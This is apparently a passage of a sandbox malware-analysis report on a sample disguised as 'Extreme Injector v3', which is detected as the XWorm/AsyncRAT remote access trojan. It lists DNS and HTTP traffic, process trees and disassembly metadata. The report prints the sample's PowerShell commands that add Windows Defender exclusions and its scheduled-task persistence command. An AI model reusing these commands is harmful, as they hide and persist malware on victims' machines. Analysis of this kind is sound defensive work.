                                                                                    Dec 31, 2024 00:47:59.393440008 CET1.1.1.1192.168.2.40x8023No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                    Dec 31, 2024 00:49:10.383852005 CET1.1.1.1192.168.2.40xbdc1No error (0)or-officials.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • ip-api.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449730208.95.112.1807412C:\Users\user\Desktop\Extreme Injector v3.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 31, 2024 00:47:59.405189991 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                    Host: ip-api.com
                                                                                    Connection: Keep-Alive
                                                                                    Dec 31, 2024 00:47:59.908580065 CET175INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 23:47:59 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 6
                                                                                    Access-Control-Allow-Origin: *
                                                                                    X-Ttl: 60
                                                                                    X-Rl: 44
                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                    Data Ascii: false


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:18:47:54
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\Desktop\Extreme Injector v3.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\Extreme Injector v3.exe"
                                                                                    Imagebase:0x360000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:18:47:58
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:18:47:58
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:18:48:05
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:18:48:05
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:18:48:19
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:18:48:19
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:18:48:34
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:18:48:34
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:18:49:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0x7ff70f330000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:18:49:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:18:49:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Imagebase:0xa70000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:18:49:16
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0xa10000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:18:49:24
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0xdd0000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:18:50:01
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Imagebase:0x390000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:22.2%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:42.9%
                                                                                      Total number of Nodes:7
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 4059 7ffd9b8979e1 4060 7ffd9b8979ff CheckRemoteDebuggerPresent 4059->4060 4062 7ffd9b897a9f 4060->4062 4055 7ffd9b899074 4056 7ffd9b89907d 4055->4056 4057 7ffd9b8991f2 RtlSetProcessIsCritical 4056->4057 4058 7ffd9b899252 4057->4058

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B8916D9 Relevance: 2.1, Strings: 1, Instructions: 895COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: SAN_^
                                                                                      • API String ID: 0-3629432999
                                                                                      • Opcode ID: a2fae7624d35f7af847093104803bec3947d301f43d48b88aa92f5df3f364e5d
                                                                                      • Instruction ID: 767507a608c5e778902e2ee2639e3e9a888aade40a6013e657104ac038c78ec4
                                                                                      • Opcode Fuzzy Hash: a2fae7624d35f7af847093104803bec3947d301f43d48b88aa92f5df3f364e5d
                                                                                      • Instruction Fuzzy Hash: 03420971B1DA095FEB98FB7C98696B977D2FF98310F410579E00EC32D6DE24A9018741
                                                                                      Function 00007FFD9B8979E1 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: 781e3aa16e77550cab32f4de6742349c54562b5d4e1ff2666ee8b6c466e4e769
                                                                                      • Instruction ID: bd306a858b49672389e246a11086bce840573e42b7606b623987efb70c317e85
                                                                                      • Opcode Fuzzy Hash: 781e3aa16e77550cab32f4de6742349c54562b5d4e1ff2666ee8b6c466e4e769
                                                                                      • Instruction Fuzzy Hash: 1A511130A0D79C8FDB59DF6888556E97FF0FF1A320F0502ABD459C7192DB28A945C781
                                                                                      Function 00007FFD9B896026 Relevance: .5, Instructions: 473COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 335 7ffd9b896026-7ffd9b896033 336 7ffd9b896035-7ffd9b89603d 335->336 337 7ffd9b89603e-7ffd9b896107 335->337 336->337 341 7ffd9b896109-7ffd9b896112 337->341 342 7ffd9b896173 337->342 341->342 344 7ffd9b896114-7ffd9b896120 341->344 343 7ffd9b896175-7ffd9b89619a 342->343 351 7ffd9b896206 343->351 352 7ffd9b89619c-7ffd9b8961a5 343->352 345 7ffd9b896159-7ffd9b896171 344->345 346 7ffd9b896122-7ffd9b896134 344->346 345->343 347 7ffd9b896136 346->347 348 7ffd9b896138-7ffd9b89614b 346->348 347->348 348->348 350 7ffd9b89614d-7ffd9b896155 348->350 350->345 353 7ffd9b896208-7ffd9b8962b0 351->353 352->351 354 7ffd9b8961a7-7ffd9b8961b3 352->354 365 7ffd9b89631e 353->365 366 7ffd9b8962b2-7ffd9b8962bc 353->366 355 7ffd9b8961b5-7ffd9b8961c7 354->355 356 7ffd9b8961ec-7ffd9b896204 354->356 358 7ffd9b8961c9 355->358 359 7ffd9b8961cb-7ffd9b8961de 355->359 356->353 358->359 359->359 361 7ffd9b8961e0-7ffd9b8961e8 359->361 361->356 367 7ffd9b896320-7ffd9b896349 365->367 366->365 368 7ffd9b8962be-7ffd9b8962cb 366->368 374 7ffd9b89634b-7ffd9b896356 367->374 375 7ffd9b8963b3 367->375 369 7ffd9b8962cd-7ffd9b8962df 368->369 370 7ffd9b896304-7ffd9b89631c 368->370 372 7ffd9b8962e1 369->372 373 7ffd9b8962e3-7ffd9b8962f6 369->373 370->367 372->373 373->373 376 7ffd9b8962f8-7ffd9b896300 373->376 374->375 377 7ffd9b896358-7ffd9b896366 374->377 378 7ffd9b8963b5-7ffd9b896446 375->378 376->370 379 7ffd9b896368-7ffd9b89637a 377->379 380 7ffd9b89639f-7ffd9b8963b1 377->380 386 7ffd9b89644c-7ffd9b89645b 378->386 381 7ffd9b89637c 379->381 382 7ffd9b89637e-7ffd9b896391 379->382 380->378 381->382 382->382 384 7ffd9b896393-7ffd9b89639b 382->384 384->380 387 7ffd9b89645d 386->387 388 7ffd9b896463-7ffd9b8964c8 call 7ffd9b8964e4 386->388 387->388 395 7ffd9b8964ca 388->395 396 7ffd9b8964cf-7ffd9b8964e2 388->396 395->396
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbddbf6da8fe789b309a6009d518955f72657858c8e167ffc541d10e9cce030b
                                                                                      • Instruction ID: 155c21109287ec65f517accc19ae75eaac3e9ef1c91d3b16788808b6ec2dc902
                                                                                      • Opcode Fuzzy Hash: fbddbf6da8fe789b309a6009d518955f72657858c8e167ffc541d10e9cce030b
                                                                                      • Instruction Fuzzy Hash: 91F1E870A09A4E8FEFA8DF68C8557E93BD1FF58350F04426EE84DC7295CB3499418B81
                                                                                      Function 00007FFD9B896DD2 Relevance: .5, Instructions: 459COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 397 7ffd9b896dd2-7ffd9b896ddf 398 7ffd9b896dea-7ffd9b896eb7 397->398 399 7ffd9b896de1-7ffd9b896de9 397->399 403 7ffd9b896eb9-7ffd9b896ec2 398->403 404 7ffd9b896f23 398->404 399->398 403->404 405 7ffd9b896ec4-7ffd9b896ed0 403->405 406 7ffd9b896f25-7ffd9b896f4a 404->406 407 7ffd9b896f09-7ffd9b896f21 405->407 408 7ffd9b896ed2-7ffd9b896ee4 405->408 413 7ffd9b896fb6 406->413 414 7ffd9b896f4c-7ffd9b896f55 406->414 407->406 409 7ffd9b896ee6 408->409 410 7ffd9b896ee8-7ffd9b896efb 408->410 409->410 410->410 412 7ffd9b896efd-7ffd9b896f05 410->412 412->407 416 7ffd9b896fb8-7ffd9b896fdd 413->416 414->413 415 7ffd9b896f57-7ffd9b896f63 414->415 417 7ffd9b896f65-7ffd9b896f77 415->417 418 7ffd9b896f9c-7ffd9b896fb4 415->418 423 7ffd9b89704b 416->423 424 7ffd9b896fdf-7ffd9b896fe9 416->424 419 7ffd9b896f79 417->419 420 7ffd9b896f7b-7ffd9b896f8e 417->420 418->416 419->420 420->420 422 7ffd9b896f90-7ffd9b896f98 420->422 422->418 425 7ffd9b89704d-7ffd9b89707b 423->425 424->423 426 7ffd9b896feb-7ffd9b896ff8 424->426 432 7ffd9b8970eb 425->432 433 7ffd9b89707d-7ffd9b897088 425->433 427 7ffd9b896ffa-7ffd9b89700c 426->427 428 7ffd9b897031-7ffd9b897049 426->428 430 7ffd9b89700e 427->430 431 7ffd9b897010-7ffd9b897023 427->431 428->425 430->431 431->431 434 7ffd9b897025-7ffd9b89702d 431->434 436 7ffd9b8970ed-7ffd9b8971c5 432->436 433->432 435 7ffd9b89708a-7ffd9b897098 433->435 434->428 437 7ffd9b89709a-7ffd9b8970ac 435->437 438 7ffd9b8970d1-7ffd9b8970e9 435->438 446 7ffd9b8971cb-7ffd9b8971da 436->446 439 7ffd9b8970ae 437->439 440 7ffd9b8970b0-7ffd9b8970c3 437->440 438->436 439->440 440->440 443 7ffd9b8970c5-7ffd9b8970cd 440->443 443->438 447 7ffd9b8971dc 446->447 448 7ffd9b8971e2-7ffd9b897244 call 7ffd9b897260 446->448 447->448 455 7ffd9b897246 448->455 456 7ffd9b89724b-7ffd9b89725e 448->456 455->456
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1183668eae0e08de9b22f681ed4a662e2bbc3a0cc1239556f3d9329e1bcba969
                                                                                      • Instruction ID: 4a723f00e4a1d1ef936df23208a60bc6a26ccc5de6f2d4da1e446d4fe5b2d1aa
                                                                                      • Opcode Fuzzy Hash: 1183668eae0e08de9b22f681ed4a662e2bbc3a0cc1239556f3d9329e1bcba969
                                                                                      • Instruction Fuzzy Hash: 8DE1B430A09A4E8FEFA8DF28C8657E97BD1FF58310F14426AE84DC7295DF7499418B81
                                                                                      Function 00007FFD9B8922F1 Relevance: .4, Instructions: 395COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9df68d30e31f9471229331473c2eb3e4007fad725a6958847f04e35e73ab9347
                                                                                      • Instruction ID: 6c6d3cdea9313d625186c2de1f23c080ca06f1dbe2a0fd6223d33684785efc70
                                                                                      • Opcode Fuzzy Hash: 9df68d30e31f9471229331473c2eb3e4007fad725a6958847f04e35e73ab9347
                                                                                      • Instruction Fuzzy Hash: 05C1A360B1D9094FEF9DEBAC94756B97BD2EF9C300F05017AE05EC32E6DE28A9024741
                                                                                      Function 00007FFD9B892059 Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68482e1ac9327cf871b4981264ae5c6ebd9b391ccd42b95a698fa1a98676540b
                                                                                      • Instruction ID: 25c637e18a158ea6a4f7c97e7c3924139bf904a112c275951f4254c14209607e
                                                                                      • Opcode Fuzzy Hash: 68482e1ac9327cf871b4981264ae5c6ebd9b391ccd42b95a698fa1a98676540b
                                                                                      • Instruction Fuzzy Hash: FE511310B1E6C94FEB9AABB858746756FE5DF8B219B0900FBE0D9C71E7DD081806C342
                                                                                      Function 00007FFD9B899074 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2695349919-0
                                                                                      • Opcode ID: 6c83a3d8e3ff2393646a6888f9cc9a895bdcbd570808944a3fd7ef0a189e03ca
                                                                                      • Instruction ID: e7d603a39ff3f87f7518ee6bdab5309938ddf2314ec98c086c873589dfddac01
                                                                                      • Opcode Fuzzy Hash: 6c83a3d8e3ff2393646a6888f9cc9a895bdcbd570808944a3fd7ef0a189e03ca
                                                                                      • Instruction Fuzzy Hash: D561263190CA4D8FDB19DBA8DC596E97BF0FF59310F04426ED09AC3292DB346946CB91

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9B8913FB Relevance: .3, Instructions: 331COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5fede156d923f891833931cda880eb0b4a3f20a703637dd8d0320b04eff6c336
                                                                                      • Instruction ID: 0368709288c3512d7c1fb34573d39bf521754b126f6cb998d4b712a8bccf5f90
                                                                                      • Opcode Fuzzy Hash: 5fede156d923f891833931cda880eb0b4a3f20a703637dd8d0320b04eff6c336
                                                                                      • Instruction Fuzzy Hash: 4BA1AF87B0F7E62EFB2267A818B51D57F60DF57265B0B00F7C1D58B0B3A809790683A1

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B89644D Relevance: .7, Instructions: 710COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1160750325bf47514edab65d10be8e4a4959a18cec089267276369deb70dc2d
                                                                                      • Instruction ID: 3cedc03bb12587e2757fdcf314ab8ff947ff71198e3722b8a72e54167ae62da9
                                                                                      • Opcode Fuzzy Hash: c1160750325bf47514edab65d10be8e4a4959a18cec089267276369deb70dc2d
                                                                                      • Instruction Fuzzy Hash: 41D19070A08A4D8FDF99DF5CC465AA97BF1FF68340F1541AAD40DD72A6CA34E881CB81
                                                                                      Function 00007FFD9B96660A Relevance: .4, Instructions: 423COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7f6f953637f984fa2eeefa0cebc114aca5a4e9f50305fd433e446ffa4e927f4
                                                                                      • Instruction ID: d7414bfbe2e4ccc38fe4fe36709f39771ab550fcbfc96ffe22c294960f9e5172
                                                                                      • Opcode Fuzzy Hash: c7f6f953637f984fa2eeefa0cebc114aca5a4e9f50305fd433e446ffa4e927f4
                                                                                      • Instruction Fuzzy Hash: 15C16832B1FA8E9FEBA8EBA858655B57BD1EF51314F0901BED45CC70E3DA18AC018341
                                                                                      Function 00007FFD9B96662B Relevance: .3, Instructions: 268COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7391e24aa3c3f25796149c2c79e00db4e81d15834cc577ef364ebe0570756b61
                                                                                      • Instruction ID: 79dfb2a0af164100eea23269fa18d7dbac2108dd8a818025610566b27fd58252
                                                                                      • Opcode Fuzzy Hash: 7391e24aa3c3f25796149c2c79e00db4e81d15834cc577ef364ebe0570756b61
                                                                                      • Instruction Fuzzy Hash: F681F222B1FB8A9FEBB997A848755B47BD1EF61344B0A00FEC04DCB1E7D918AD058341
                                                                                      Function 00007FFD9B899F52 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
